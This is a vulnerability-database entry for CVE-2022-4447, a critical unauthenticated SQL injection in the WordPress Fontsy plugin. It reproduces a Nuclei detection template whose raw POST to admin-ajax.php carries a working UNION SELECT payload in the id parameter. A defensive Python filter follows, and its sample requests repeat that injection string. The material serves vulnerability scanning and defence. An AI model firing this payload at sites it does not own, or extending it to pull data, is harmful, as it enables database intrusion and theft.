nuclei | ProjectDiscovery | NUCLEI:CVE-2022-4447
History: Jan 14, 2023 - 5:54 a.m.

WordPress Fontsy <=1.8.6 - SQL Injection

2023-01-14 05:54:28
ProjectDiscovery
github.com
Tags: wordpress, fontsy, sql injection, vulnerability, update, sqli, unauth

CVSS3: 9.8

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.088
Percentile: 94.7%

WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

id: CVE-2022-4447

info:
  name: WordPress Fontsy <=1.8.6 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action.  An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad
    - https://wordpress.org/plugins/fontsy/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4447
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4447
    cwe-id: CWE-89
    epss-score: 0.04713
    epss-percentile: 0.92631
    cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fontsy_project
    product: fontsy
    framework: wordpress
  tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "{{md5(num)}}")'
        condition: and
# digest: 4a0a00473045022021766a949cd8ce92eba5417c3955b72e5125cbeb4e851636eb75685f6d0fb24c022100c54171ad7da1e1f3267551cb193282182c18b7e80504d734197d6dd16b8b5d1f:922c64590222798bb761d5b6d8e72950
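
For defenders who cannot update immediately, the request shape in the template above can be screened at a reverse proxy or in log review. The following is an added example, not part of the ProjectDiscovery template or the plugin's code; it assumes a legitimate id value is a plain non-negative integer, and the function name and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "get_tag_fonts"  # AJAX action named in the template
# Assumption (not stated on the page): a legitimate id is a plain integer.
PLAIN_INT = re.compile(r"\d{1,10}")


def _params(url, body):
    """Merge decoded query-string and form-body parameters, keeping all values."""
    merged = {}
    for source in (urlsplit(url).query, body or ""):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            merged.setdefault(key, []).extend(values)
    return merged


def flag_request(url, body=""):
    """Return a reason string if the request should be flagged, else None."""
    if not urlsplit(url).path.endswith(AJAX_PATH):
        return None
    params = _params(url, body)
    # The action may arrive in the query string or in the form body.
    if ACTION not in params.get("action", []):
        return None
    bad = [v for v in params.get("id", []) if not PLAIN_INT.fullmatch(v.strip())]
    if bad:
        return f"non-integer id for {ACTION}: {bad[0][:60]!r}"
    return None


# Constructed sample requests: (URL, form body).
SAMPLES = [
    ("/wp-admin/admin-ajax.php?action=get_tag_fonts", "id=12"),
    ("/wp-admin/admin-ajax.php?action=get_tag_fonts",
     "id=-5219 UNION ALL SELECT NULL,NULL,NULL,md5(999999999),NULL--"),
    ("/wp-admin/admin-ajax.php", "action=get_tag_fonts&id=3%27"),
    ("/wp-admin/admin-ajax.php?action=heartbeat", "id=abc"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, "->", flag_request(url, body))
```

The check is an allow-list on the parameter rather than a keyword match, so it flags any non-numeric id sent to this action regardless of the SQL used.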
